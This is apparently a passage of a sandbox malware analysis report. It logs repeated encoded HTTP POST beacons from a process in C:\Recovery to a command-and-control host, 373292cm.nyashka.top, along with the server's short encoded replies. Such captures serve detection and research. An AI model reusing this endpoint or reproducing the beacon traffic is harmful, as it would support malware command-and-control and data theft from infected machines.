                                    Data Raw: 3b 55 5f 5b
                                    Data Ascii: ;U_[


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    97192.168.2.64982580.211.144.156806244C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe
                                    TimestampBytes transferredDirectionData
                                    Aug 25, 2024 15:44:52.858716965 CEST269OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                    Content-Type: application/x-www-form-urlencoded
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                    Host: 373292cm.nyashka.top
                                    Content-Length: 2516
                                    Expect: 100-continue
                                    Aug 25, 2024 15:44:53.216969013 CEST2516OUTData Raw: 5a 52 59 53 51 47 54 51 5b 5f 5a 51 59 56 58 54 57 51 5d 5d 57 5e 53 55 5c 5d 5f 5a 5b 5f 5f 55 5a 5a 52 5b 55 5f 55 52 58 5e 5c 58 55 56 54 59 5a 5f 58 5b 58 5f 50 5e 58 5d 53 5a 57 59 50 5e 5c 5d 5c 58 50 5f 57 50 42 5e 5a 53 42 58 58 5a 53 5f
                                    Data Ascii: ZRYSQGTQ[_ZQYVXTWQ]]W^SU\]_Z[__UZZR[U_URX^\XUVTYZ_X[X_P^X]SZWYP^\]\XP_WPB^ZSBXXZS_TRW]_]S]UP^]QU^^^RU[[_T[ATZ_YXZZXQXTXUZ__[^UCSYT_VX\TR[\ZQ_A\SS_[[QZV[Y_G\T^[RB\]YX_XPZQR_[XYRC[YXZW[V-. ?A5[+7 1+. _+]<.;]#,'S4!++#&/>&F$.Y/!
                                    Aug 25, 2024 15:44:53.553256989 CEST25INHTTP/1.1 100 Continue
                                    Aug 25, 2024 15:44:53.756934881 CEST158INHTTP/1.1 200 OK
                                    Server: nginx
                                    Date: Sun, 25 Aug 2024 13:44:53 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Content-Length: 4
                                    Connection: keep-alive
                                    Data Raw: 3b 55 5f 5b
                                    Data Ascii: ;U_[


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    98192.168.2.64982680.211.144.156806244C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe
                                    TimestampBytes transferredDirectionData
                                    Aug 25, 2024 15:44:53.878699064 CEST293OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                    Content-Type: application/x-www-form-urlencoded
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                    Host: 373292cm.nyashka.top
                                    Content-Length: 2516
                                    Expect: 100-continue
                                    Connection: Keep-Alive
                                    Aug 25, 2024 15:44:54.232433081 CEST2516OUTData Raw: 5f 50 59 52 54 49 51 5b 5b 5f 5a 51 59 50 58 57 57 50 5d 5a 57 59 53 5a 5c 5d 5f 5a 5b 5f 5f 55 5a 5a 52 5b 55 5f 55 52 58 5e 5c 58 55 56 54 59 5a 5f 58 5b 58 5f 50 5e 58 5d 53 5a 57 59 50 5e 5c 5d 5c 58 50 5f 57 50 42 5e 5a 53 42 58 58 5a 53 5f
                                    Data Ascii: _PYRTIQ[[_ZQYPXWWP]ZWYSZ\]_Z[__UZZR[U_URX^\XUVTYZ_X[X_P^X]SZWYP^\]\XP_WPB^ZSBXXZS_TRW]_]S]UP^]QU^^^RU[[_T[ATZ_YXZZXQXTXUZ__[^UCSYT_VX\TR[\ZQ_A\SS_[[QZV[Y_G\T^[RB\]YX_XPZQR_[XYRC[YXZW[V-;3A!>(Y 0:==++9_)>(#V!"'<9" \;.&F$.Y/
                                    Aug 25, 2024 15:44:54.568727970 CEST25INHTTP/1.1 100 Continue
                                    Aug 25, 2024 15:44:54.705913067 CEST158INHTTP/1.1 200 OK
                                    Server: nginx
                                    Date: Sun, 25 Aug 2024 13:44:54 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Content-Length: 4
                                    Connection: keep-alive
                                    Data Raw: 3b 55 5f 5b
                                    Data Ascii: ;U_[


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    99192.168.2.64982780.211.144.156806244C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe
                                    TimestampBytes transferredDirectionData
                                    Aug 25, 2024 15:44:54.841490984 CEST293OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                    Content-Type: application/x-www-form-urlencoded
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                    Host: 373292cm.nyashka.top
                                    Content-Length: 2516
                                    Expect: 100-continue
                                    Connection: Keep-Alive
                                    Aug 25, 2024 15:44:55.226845026 CEST2516OUTData Raw: 5f 52 59 50 51 47 54 58 5b 5f 5a 51 59 56 58 51 57 58 5d 5d 57 5d 53 5e 5c 5d 5f 5a 5b 5f 5f 55 5a 5a 52 5b 55 5f 55 52 58 5e 5c 58 55 56 54 59 5a 5f 58 5b 58 5f 50 5e 58 5d 53 5a 57 59 50 5e 5c 5d 5c 58 50 5f 57 50 42 5e 5a 53 42 58 58 5a 53 5f
                                    Data Ascii: _RYPQGTX[_ZQYVXQWX]]W]S^\]_Z[__UZZR[U_URX^\XUVTYZ_X[X_P^X]SZWYP^\]\XP_WPB^ZSBXXZS_TRW]_]S]UP^]QU^^^RU[[_T[ATZ_YXZZXQXTXUZ__[^UCSYT_VX\TR[\ZQ_A\SS_[[QZV[Y_G\T^[RB\]YX_XPZQR_[XYRC[YXZW[V-,0/D!X4V))(\<.!\?+X7W#1+] 9Y.>&F$.Y/!
                                    Aug 25, 2024 15:44:55.536597967 CEST25INHTTP/1.1 100 Continue
                                    Aug 25, 2024 15:44:55.737406969 CEST158INHTTP/1.1 200 OK
                                    Server: nginx
                                    Date: Sun, 25 Aug 2024 13:44:55 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Content-Length: 4
                                    Connection: keep-alive
                                    Data Raw: 3b 55 5f 5b
                                    Data Ascii: ;U_[


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    100192.168.2.64982880.211.144.156806244C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe
                                    TimestampBytes transferredDirectionData
                                    Aug 25, 2024 15:44:55.860450029 CEST293OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                    Content-Type: application/x-www-form-urlencoded
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                    Host: 373292cm.nyashka.top
                                    Content-Length: 2516
                                    Expect: 100-continue
                                    Connection: Keep-Alive
                                    Aug 25, 2024 15:44:56.216856003 CEST2516OUTData Raw: 5f 5d 5c 54 51 44 54 58 5b 5f 5a 51 59 53 58 52 57 59 5d 5c 57 5f 53 5d 5c 5d 5f 5a 5b 5f 5f 55 5a 5a 52 5b 55 5f 55 52 58 5e 5c 58 55 56 54 59 5a 5f 58 5b 58 5f 50 5e 58 5d 53 5a 57 59 50 5e 5c 5d 5c 58 50 5f 57 50 42 5e 5a 53 42 58 58 5a 53 5f
                                    Data Ascii: _]\TQDTX[_ZQYSXRWY]\W_S]\]_Z[__UZZR[U_URX^\XUVTYZ_X[X_P^X]SZWYP^\]\XP_WPB^ZSBXXZS_TRW]_]S]UP^]QU^^^RU[[_T[ATZ_YXZZXQXTXUZ__[^UCSYT_VX\TR[\ZQ_A\SS_[[QZV[Y_G\T^[RB\]YX_XPZQR_[XYRC[YXZW[V.^;#0#><70"*-7<"?=7,+P#(V+*' ",.&F$.Y/5
                                    Aug 25, 2024 15:44:56.531467915 CEST25INHTTP/1.1 100 Continue
                                    Aug 25, 2024 15:44:56.820089102 CEST158INHTTP/1.1 200 OK
                                    Server: nginx
                                    Date: Sun, 25 Aug 2024 13:44:56 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Content-Length: 4
                                    Connection: keep-alive
                                    Data Raw: 3b 55 5f 5b
                                    Data Ascii: ;U_[


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    101192.168.2.64982980.211.144.156806244C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe
                                    TimestampBytes transferredDirectionData
                                    Aug 25, 2024 15:44:56.979315042 CEST293OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                    Content-Type: application/x-www-form-urlencoded
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                    Host: 373292cm.nyashka.top
                                    Content-Length: 2516
                                    Expect: 100-continue
                                    Connection: Keep-Alive
                                    Aug 25, 2024 15:44:57.326267004 CEST2516OUTData Raw: 5a 56 5c 5f 54 42 54 5d 5b 5f 5a 51 59 51 58 53 57 58 5d 52 57 5c 53 55 5c 5d 5f 5a 5b 5f 5f 55 5a 5a 52 5b 55 5f 55 52 58 5e 5c 58 55 56 54 59 5a 5f 58 5b 58 5f 50 5e 58 5d 53 5a 57 59 50 5e 5c 5d 5c 58 50 5f 57 50 42 5e 5a 53 42 58 58 5a 53 5f
                                    Data Ascii: ZV\_TBT][_ZQYQXSWX]RW\SU\]_Z[__UZZR[U_URX^\XUVTYZ_X[X_P^X]SZWYP^\]\XP_WPB^ZSBXXZS_TRW]_]S]UP^]QU^^^RU[[_T[ATZ_YXZZXQXTXUZ__[^UCSYT_VX\TR[\ZQ_A\SS_[[QZV[Y_G\T^[RB\]YX_XPZQR_[XYRC[YXZW[V.^;B"-7#V5*-3())-<"<3Q!10W?*8##98&F$.Y/=


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    102192.168.2.64983080.211.144.156806244C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe
                                    TimestampBytes transferredDirectionData
                                    Aug 25, 2024 15:44:57.582565069 CEST293OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                    Content-Type: application/x-www-form-urlencoded
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                    Host: 373292cm.nyashka.top
                                    Content-Length: 1820
                                    Expect: 100-continue
                                    Connection: Keep-Alive
                                    Aug 25, 2024 15:44:58.110150099 CEST1820OUTData Raw: 5f 57 5c 52 54 41 54 58 5b 5f 5a 51 59 51 58 54 57 5d 5d 5d 57 5b 53 5e 5c 5d 5f 5a 5b 5f 5f 55 5a 5a 52 5b 55 5f 55 52 58 5e 5c 58 55 56 54 59 5a 5f 58 5b 58 5f 50 5e 58 5d 53 5a 57 59 50 5e 5c 5d 5c 58 50 5f 57 50 42 5e 5a 53 42 58 58 5a 53 5f
                                    Data Ascii: _W\RTATX[_ZQYQXTW]]]W[S^\]_Z[__UZZR[U_URX^\XUVTYZ_X[X_P^X]SZWYP^\]\XP_WPB^ZSBXXZS_TRW]_]S]UP^]QU^^^RU[[_T[ATZ_YXZZXQXTXUZ__[^UCSYT_VX\TR[\ZQ_A\SS_[[QZV[Y_G\T^[RB\]YX_XPZQR_[XYRC[YXZW[V.Y83;C57>+>3+>6<74#++*7#&/>&F$.Y/=
                                    Aug 25, 2024 15:44:58.248658895 CEST25INHTTP/1.1 100 Continue
                                    Aug 25, 2024 15:44:58.400324106 CEST308INHTTP/1.1 200 OK
                                    Server: nginx
                                    Date: Sun, 25 Aug 2024 13:44:57 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Content-Length: 152
                                    Connection: keep-alive
                                    Data Raw: 09 1d 26 57 3d 26 2e 5b 31 02 2c 52 27 23 00 1d 2a 13 3b 5b 2a 2d 35 58 27 01 36 01 32 00 05 0c 33 3b 00 02 28 00 29 0b 24 3f 2c 05 2c 24 2b 5d 0c 13 21 05 34 04 26 5b 26 3c 01 04 29 16 34 07 36 12 3a 5b 2b 29 2a 0b 28 11 33 01 28 07 09 5b 2b 2a 03 0e 2c 3b 35 5f 3a 0e 00 57 20 04 2b 52 0d 11 24 53 28 3e 3e 0a 3e 00 27 15 21 06 0d 5e 24 3d 00 50 26 0c 0c 1e 27 39 30 10 25 0b 35 1c 27 0f 29 1c 25 3b 22 5b 31 11 00 0e 22 18 23 54 2c 00 22 57 01 33 55 56
                                    Data Ascii: &W=&.[1,R'#*;[*-5X'623;()$?,,$+]!4&[&<)46:[+)*(3([+*,;5_:W +R$S(>>>'!^$=P&'90%5')%;"[1"#T,"W3UV


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    103192.168.2.64983180.211.144.156806244C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe
                                    TimestampBytes transferredDirectionData
                                    Aug 25, 2024 15:44:57.771492958 CEST293OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                    Content-Type: application/x-www-form-urlencoded
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                    Host: 373292cm.nyashka.top
                                    Content-Length: 2516
                                    Expect: 100-continue
                                    Connection: Keep-Alive
                                    Aug 25, 2024 15:44:58.127824068 CEST2516OUTData Raw: 5a 51 59 50 54 48 51 59 5b 5f 5a 51 59 5f 58 54 57 51 5d 5d 57 5f 53 55 5c 5d 5f 5a 5b 5f 5f 55 5a 5a 52 5b 55 5f 55 52 58 5e 5c 58 55 56 54 59 5a 5f 58 5b 58 5f 50 5e 58 5d 53 5a 57 59 50 5e 5c 5d 5c 58 50 5f 57 50 42 5e 5a 53 42 58 58 5a 53 5f
                                    Data Ascii: ZQYPTHQY[_ZQY_XTWQ]]W_SU\]_Z[__UZZR[U_URX^\XUVTYZ_X[X_P^X]SZWYP^\]\XP_WPB^ZSBXXZS_TRW]_]S]UP^]QU^^^RU[[_T[ATZ_YXZZXQXTXUZ__[^UCSYT_VX\TR[\ZQ_A\SS_[[QZV[Y_G\T^[RB\]YX_XPZQR_[XYRC[YXZW[V.^,0;!.?739+= ((.+Z4 2'?*443),&F$.Y/
                                    Aug 25, 2024 15:44:58.458197117 CEST25INHTTP/1.1 100 Continue
                                    Aug 25, 2024 15:44:58.654808998 CEST158INHTTP/1.1 200 OK
                                    Server: nginx
                                    Date: Sun, 25 Aug 2024 13:44:58 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Content-Length: 4
                                    Connection: keep-alive
                                    Data Raw: 3b 55 5f 5b
                                    Data Ascii: ;U_[


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    104192.168.2.64983280.211.144.156806244C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe
                                    TimestampBytes transferredDirectionData
                                    Aug 25, 2024 15:44:58.781116962 CEST269OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                    Content-Type: application/x-www-form-urlencoded
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                    Host: 373292cm.nyashka.top
                                    Content-Length: 2516
                                    Expect: 100-continue
                                    Aug 25, 2024 15:44:59.138873100 CEST2516OUTData Raw: 5f 54 59 55 54 49 54 5a 5b 5f 5a 51 59 5f 58 51 57 5c 5d 5e 57 5a 53 5b 5c 5d 5f 5a 5b 5f 5f 55 5a 5a 52 5b 55 5f 55 52 58 5e 5c 58 55 56 54 59 5a 5f 58 5b 58 5f 50 5e 58 5d 53 5a 57 59 50 5e 5c 5d 5c 58 50 5f 57 50 42 5e 5a 53 42 58 58 5a 53 5f
                                    Data Ascii: _TYUTITZ[_ZQY_XQW\]^WZS[\]_Z[__UZZR[U_URX^\XUVTYZ_X[X_P^X]SZWYP^\]\XP_WPB^ZSBXXZS_TRW]_]S]UP^]QU^^^RU[[_T[ATZ_YXZZXQXTXUZ__[^UCSYT_VX\TR[\ZQ_A\SS_[[QZV[Y_G\T^[RB\]YX_XPZQR_[XYRC[YXZW[V.\8;D5$X :=[3<]?[']4070(9^#V)]/&F$.Y/
                                    Aug 25, 2024 15:44:59.482914925 CEST25INHTTP/1.1 100 Continue
                                    Aug 25, 2024 15:44:59.684032917 CEST158INHTTP/1.1 200 OK
                                    Server: nginx
                                    Date: Sun, 25 Aug 2024 13:44:59 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Content-Length: 4
                                    Connection: keep-alive
                                    Data Raw: 3b 55 5f 5b
                                    Data Ascii: ;U_[


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    105192.168.2.64983380.211.144.156806244C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe
                                    TimestampBytes transferredDirectionData
                                    Aug 25, 2024 15:44:59.814471960 CEST269OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                    Content-Type: application/x-www-form-urlencoded
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                    Host: 373292cm.nyashka.top
                                    Content-Length: 2516
                                    Expect: 100-continue
                                    Aug 25, 2024 15:45:00.170234919 CEST2516OUTData Raw: 5a 52 5c 53 51 40 54 51 5b 5f 5a 51 59 52 58 56 57 50 5d 52 57 5a 53 58 5c 5d 5f 5a 5b 5f 5f 55 5a 5a 52 5b 55 5f 55 52 58 5e 5c 58 55 56 54 59 5a 5f 58 5b 58 5f 50 5e 58 5d 53 5a 57 59 50 5e 5c 5d 5c 58 50 5f 57 50 42 5e 5a 53 42 58 58 5a 53 5f
                                    Data Ascii: ZR\SQ@TQ[_ZQYRXVWP]RWZSX\]_Z[__UZZR[U_URX^\XUVTYZ_X[X_P^X]SZWYP^\]\XP_WPB^ZSBXXZS_TRW]_]S]UP^]QU^^^RU[[_T[ATZ_YXZZXQXTXUZ__[^UCSYT_VX\TR[\ZQ_A\SS_[[QZV[Y_G\T^[RB\]YX_XPZQR_[XYRC[YXZW[V./;E"# +>3(X>?4+41S**+4]/&F$.Y/1
                                    Aug 25, 2024 15:45:00.503534079 CEST25INHTTP/1.1 100 Continue
                                    Aug 25, 2024 15:45:00.633838892 CEST158INHTTP/1.1 200 OK
                                    Server: nginx
                                    Date: Sun, 25 Aug 2024 13:45:00 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Content-Length: 4
                                    Connection: keep-alive
                                    Data Raw: 3b 55 5f 5b
                                    Data Ascii: ;U_[


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    106192.168.2.64983480.211.144.156806244C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe
                                    TimestampBytes transferredDirectionData
                                    Aug 25, 2024 15:45:00.802685976 CEST269OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                    Content-Type: application/x-www-form-urlencoded
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                    Host: 373292cm.nyashka.top
                                    Content-Length: 2516
                                    Expect: 100-continue
                                    Aug 25, 2024 15:45:01.154418945 CEST2516OUTData Raw: 5a 50 59 55 51 40 54 50 5b 5f 5a 51 59 55 58 56 57 5d 5d 58 57 5f 53 54 5c 5d 5f 5a 5b 5f 5f 55 5a 5a 52 5b 55 5f 55 52 58 5e 5c 58 55 56 54 59 5a 5f 58 5b 58 5f 50 5e 58 5d 53 5a 57 59 50 5e 5c 5d 5c 58 50 5f 57 50 42 5e 5a 53 42 58 58 5a 53 5f
                                    Data Ascii: ZPYUQ@TP[_ZQYUXVW]]XW_ST\]_Z[__UZZR[U_URX^\XUVTYZ_X[X_P^X]SZWYP^\]\XP_WPB^ZSBXXZS_TRW]_]S]UP^]QU^^^RU[[_T[ATZ_YXZZXQXTXUZ__[^UCSYT_VX\TR[\ZQ_A\SS_[[QZV[Y_G\T^[RB\]YX_XPZQR_[XYRC[YXZW[V.\/3!=07#*+=\+?4?3W#1<7\4V).>&F$.Y/-
                                    Aug 25, 2024 15:45:01.492856026 CEST25INHTTP/1.1 100 Continue
                                    Aug 25, 2024 15:45:01.623974085 CEST158INHTTP/1.1 200 OK
                                    Server: nginx
                                    Date: Sun, 25 Aug 2024 13:45:01 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Content-Length: 4
                                    Connection: keep-alive
                                    Data Raw: 3b 55 5f 5b
                                    Data Ascii: ;U_[


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    107192.168.2.64983580.211.144.156806244C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe
                                    TimestampBytes transferredDirectionData
                                    Aug 25, 2024 15:45:01.751338005 CEST293OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                    Content-Type: application/x-www-form-urlencoded
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                    Host: 373292cm.nyashka.top
                                    Content-Length: 2516
                                    Expect: 100-continue
                                    Connection: Keep-Alive
                                    Aug 25, 2024 15:45:02.107609034 CEST2516OUTData Raw: 5f 53 59 53 54 49 51 5b 5b 5f 5a 51 59 54 58 56 57 51 5d 5e 57 5f 53 5b 5c 5d 5f 5a 5b 5f 5f 55 5a 5a 52 5b 55 5f 55 52 58 5e 5c 58 55 56 54 59 5a 5f 58 5b 58 5f 50 5e 58 5d 53 5a 57 59 50 5e 5c 5d 5c 58 50 5f 57 50 42 5e 5a 53 42 58 58 5a 53 5f
                                    Data Ascii: _SYSTIQ[[_ZQYTXVWQ]^W_S[\]_Z[__UZZR[U_URX^\XUVTYZ_X[X_P^X]SZWYP^\]\XP_WPB^ZSBXXZS_TRW]_]S]UP^]QU^^^RU[[_T[ATZ_YXZZXQXTXUZ__[^UCSYT_VX\TR[\ZQ_A\SS_[[QZV[Y_G\T^[RB\]YX_XPZQR_[XYRC[YXZW[V-,?B!4# *-$^<=(?X43V#3(#^" 2,&F$.Y/)
                                    Aug 25, 2024 15:45:02.444463015 CEST25INHTTP/1.1 100 Continue
                                    Aug 25, 2024 15:45:02.579654932 CEST158INHTTP/1.1 200 OK
                                    Server: nginx
                                    Date: Sun, 25 Aug 2024 13:45:01 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Content-Length: 4
                                    Connection: keep-alive
                                    Data Raw: 3b 55 5f 5b
                                    Data Ascii: ;U_[


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    108192.168.2.64983680.211.144.156806244C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe
                                    TimestampBytes transferredDirectionData
                                    Aug 25, 2024 15:45:02.705707073 CEST293OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                    Content-Type: application/x-www-form-urlencoded
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                    Host: 373292cm.nyashka.top
                                    Content-Length: 2516
                                    Expect: 100-continue
                                    Connection: Keep-Alive
                                    Aug 25, 2024 15:45:03.113044977 CEST2516OUTData Raw: 5a 52 5c 51 51 47 51 5c 5b 5f 5a 51 59 53 58 56 57 5c 5d 5b 57 5a 53 58 5c 5d 5f 5a 5b 5f 5f 55 5a 5a 52 5b 55 5f 55 52 58 5e 5c 58 55 56 54 59 5a 5f 58 5b 58 5f 50 5e 58 5d 53 5a 57 59 50 5e 5c 5d 5c 58 50 5f 57 50 42 5e 5a 53 42 58 58 5a 53 5f
                                    Data Ascii: ZR\QQGQ\[_ZQYSXVW\][WZSX\]_Z[__UZZR[U_URX^\XUVTYZ_X[X_P^X]SZWYP^\]\XP_WPB^ZSBXXZS_TRW]_]S]UP^]QU^^^RU[[_T[ATZ_YXZZXQXTXUZ__[^UCSYT_VX\TR[\ZQ_A\SS_[[QZV[Y_G\T^[RB\]YX_XPZQR_[XYRC[YXZW[V-;/D!-4X7 &+=?)Z(-(4Q "#(9 #%8>&F$.Y/5
                                    Aug 25, 2024 15:45:03.381527901 CEST25INHTTP/1.1 100 Continue


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    109192.168.2.64983780.211.144.156806244C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe
                                    TimestampBytes transferredDirectionData
                                    Aug 25, 2024 15:45:03.411807060 CEST293OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                    Content-Type: application/x-www-form-urlencoded
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                    Host: 373292cm.nyashka.top
                                    Content-Length: 1840
                                    Expect: 100-continue
                                    Connection: Keep-Alive
                                    Aug 25, 2024 15:45:03.763684988 CEST1840OUTData Raw: 5a 52 5c 5e 54 40 51 5e 5b 5f 5a 51 59 52 58 5e 57 5c 5d 5a 57 5b 53 5e 5c 5d 5f 5a 5b 5f 5f 55 5a 5a 52 5b 55 5f 55 52 58 5e 5c 58 55 56 54 59 5a 5f 58 5b 58 5f 50 5e 58 5d 53 5a 57 59 50 5e 5c 5d 5c 58 50 5f 57 50 42 5e 5a 53 42 58 58 5a 53 5f
                                    Data Ascii: ZR\^T@Q^[_ZQYRX^W\]ZW[S^\]_Z[__UZZR[U_URX^\XUVTYZ_X[X_P^X]SZWYP^\]\XP_WPB^ZSBXXZS_TRW]_]S]UP^]QU^^^RU[[_T[ATZ_YXZZXQXTXUZ__[^UCSYT_VX\TR[\ZQ_A\SS_[[QZV[Y_G\T^[RB\]YX_XPZQR_[XYRC[YXZW[V./3".$^"0%])7<-&(-/Y ?/R4" Q?9;X"05_8&F$.Y/1
                                    Aug 25, 2024 15:45:04.090265036 CEST25INHTTP/1.1 100 Continue
                                    Aug 25, 2024 15:45:04.222702980 CEST308INHTTP/1.1 200 OK
                                    Server: nginx
                                    Date: Sun, 25 Aug 2024 13:45:03 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Content-Length: 152
                                    Connection: keep-alive
                                    Data Raw: 09 1d 26 11 29 1c 36 10 26 28 24 18 24 20 3a 1f 2b 3d 37 58 3e 04 26 06 27 06 21 17 31 10 3b 0f 24 38 35 59 28 00 3a 57 24 3c 2f 1e 2c 24 2b 5d 0c 13 22 5f 34 29 36 5d 32 02 2f 05 3e 28 37 5b 22 02 26 13 29 39 31 19 3c 59 3c 5f 3f 2a 23 13 2a 2a 3e 1e 2f 01 39 18 2e 0e 08 1e 34 14 2b 52 0d 11 27 0d 28 13 2e 0b 28 3e 3c 00 35 06 23 58 27 5b 2e 1e 26 54 39 0b 27 39 33 03 31 32 3e 0d 24 08 22 0c 26 15 2e 13 26 2f 21 12 23 22 23 54 2c 00 22 57 01 33 55 56
                                    Data Ascii: &)6&($$ :+=7X>&'!1;$85Y(:W$</,$+]"_4)6]2/>(7["&)91<Y<_?*#**>/9.4+R'(.(><5#X'[.&T9'9312>$"&.&/!#"#T,"W3UV


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    110192.168.2.64983880.211.144.156806244C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe
                                    TimestampBytes transferredDirectionData
                                    Aug 25, 2024 15:45:03.531424046 CEST293OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                    Content-Type: application/x-www-form-urlencoded
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                    Host: 373292cm.nyashka.top
                                    Content-Length: 2516
                                    Expect: 100-continue
                                    Connection: Keep-Alive
                                    Aug 25, 2024 15:45:03.888775110 CEST2516OUTData Raw: 5a 50 5c 5f 54 43 54 51 5b 5f 5a 51 59 56 58 50 57 5c 5d 59 57 5f 53 55 5c 5d 5f 5a 5b 5f 5f 55 5a 5a 52 5b 55 5f 55 52 58 5e 5c 58 55 56 54 59 5a 5f 58 5b 58 5f 50 5e 58 5d 53 5a 57 59 50 5e 5c 5d 5c 58 50 5f 57 50 42 5e 5a 53 42 58 58 5a 53 5f
                                    Data Ascii: ZP\_TCTQ[_ZQYVXPW\]YW_SU\]_Z[__UZZR[U_URX^\XUVTYZ_X[X_P^X]SZWYP^\]\XP_WPB^ZSBXXZS_TRW]_]S]UP^]QU^^^RU[[_T[ATZ_YXZZXQXTXUZ__[^UCSYT_VX\TR[\ZQ_A\SS_[[QZV[Y_G\T^[RB\]YX_XPZQR_[XYRC[YXZW[V-.386735Z)= _>>-\)=#Z?7$(*#Y" _8>&F$.Y/!
                                    Aug 25, 2024 15:45:04.217706919 CEST25INHTTP/1.1 100 Continue
                                    Aug 25, 2024 15:45:04.421305895 CEST158INHTTP/1.1 200 OK
                                    Server: nginx
                                    Date: Sun, 25 Aug 2024 13:45:03 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Content-Length: 4
                                    Connection: keep-alive
                                    Data Raw: 3b 55 5f 5b
                                    Data Ascii: ;U_[


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    111192.168.2.64983980.211.144.156806244C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe
                                    TimestampBytes transferredDirectionData
                                    Aug 25, 2024 15:45:05.276043892 CEST269OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                    Content-Type: application/x-www-form-urlencoded
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                    Host: 373292cm.nyashka.top
                                    Content-Length: 2512
                                    Expect: 100-continue
                                    Aug 25, 2024 15:45:05.684885025 CEST2512OUTData Raw: 5f 56 59 54 54 41 54 50 5b 5f 5a 51 59 57 58 50 57 58 5d 52 57 58 53 5e 5c 5d 5f 5a 5b 5f 5f 55 5a 5a 52 5b 55 5f 55 52 58 5e 5c 58 55 56 54 59 5a 5f 58 5b 58 5f 50 5e 58 5d 53 5a 57 59 50 5e 5c 5d 5c 58 50 5f 57 50 42 5e 5a 53 42 58 58 5a 53 5f
